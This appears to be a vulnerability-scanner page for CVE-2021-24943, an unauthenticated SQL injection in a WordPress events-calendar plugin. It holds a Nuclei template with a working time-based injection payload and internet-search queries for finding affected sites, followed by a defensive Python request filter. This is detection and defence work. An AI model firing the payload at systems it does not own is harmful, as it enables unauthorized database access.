Registrations for the Events Calendar < 2.7.6 - SQL Injection
ID: CVE-2021-24943
Severity: critical
Author: ritikchaddha
Tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
Description
The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
YAML Source
id: CVE-2021-24943

info:
  name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
  remediation: Fixed in 2.7.6
  reference:
    - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24943
    - https://wordpress.org/plugins/registrations-for-the-events-calendar/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24943
    cwe-id: CWE-89
    epss-score: 0.20551
    epss-percentile: 0.96367
    cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: roundupwp
    product: registrations_for_the_events_calendar
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
    fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
    publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp

variables:
  text: "{{rand_base(5)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(body, "Please enter the email you registered with")'
        condition: and
# digest: 4a0a0047304502203e24dbf1c47c69f360d015e707375a3aca097db66f8b9139584ace12185be339022100ffcb5bd7786349c750a771aaa4c4dbcf11f18da7b2970bebee0d15c7cf92a262:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24943.yaml"
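The following is an added example, not part of the template or of the plugin's code: a request screen a defender could run in front of sites still below 2.7.6, rejecting calls to the rtec_send_unregister_link action unless event_id is a single plain integer. It assumes event_id is a numeric post ID; check_request, demo and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

ACTION = "rtec_send_unregister_link"   # AJAX action named in the description
INT_RE = re.compile(r"[0-9]{1,10}")    # assumption: event_id is a numeric post ID


def check_request(target, body):
    """Classify one HTTP request by its request target and form-encoded body.

    Returns "ignore" (not this AJAX action), "allow" (event_id is one plain
    integer) or "block" (event_id missing, repeated, or not a plain integer).
    """
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return "ignore"
    query = parse_qs(url.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    # admin-ajax.php takes the action from $_REQUEST, so it can arrive in the
    # query string or in the body; event_id is checked in both to be safe.
    actions = query.get("action", []) + form.get("action", [])
    if ACTION not in actions:
        return "ignore"
    ids = query.get("event_id", []) + form.get("event_id", [])
    if len(ids) != 1:
        return "block"   # missing or duplicated parameter
    return "allow" if INT_RE.fullmatch(ids[0]) else "block"


# Constructed sample requests (request target, body).
SAMPLES = [
    ("/wp-admin/admin-ajax.php?action=rtec_send_unregister_link",
     "event_id=3&email=user@example.com"),
    # Body shape sent by the template above, with a placeholder email.
    ("/wp-admin/admin-ajax.php?action=rtec_send_unregister_link",
     "event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email=a@a.com"),
    ("/wp-admin/admin-ajax.php?action=heartbeat", "event_id=x"),
    ("/wp-admin/admin-ajax.php",
     "action=rtec_send_unregister_link&event_id=3&event_id=4"),
]


def demo():
    return [check_request(target, body) for target, body in SAMPLES]


if __name__ == "__main__":
    for (target, body), verdict in zip(SAMPLES, demo()):
        print(f"{verdict:6} {target} {body!r}")
```

A screen like this only narrows exposure on unpatched hosts; the remediation stated in the template is the update to 2.7.6.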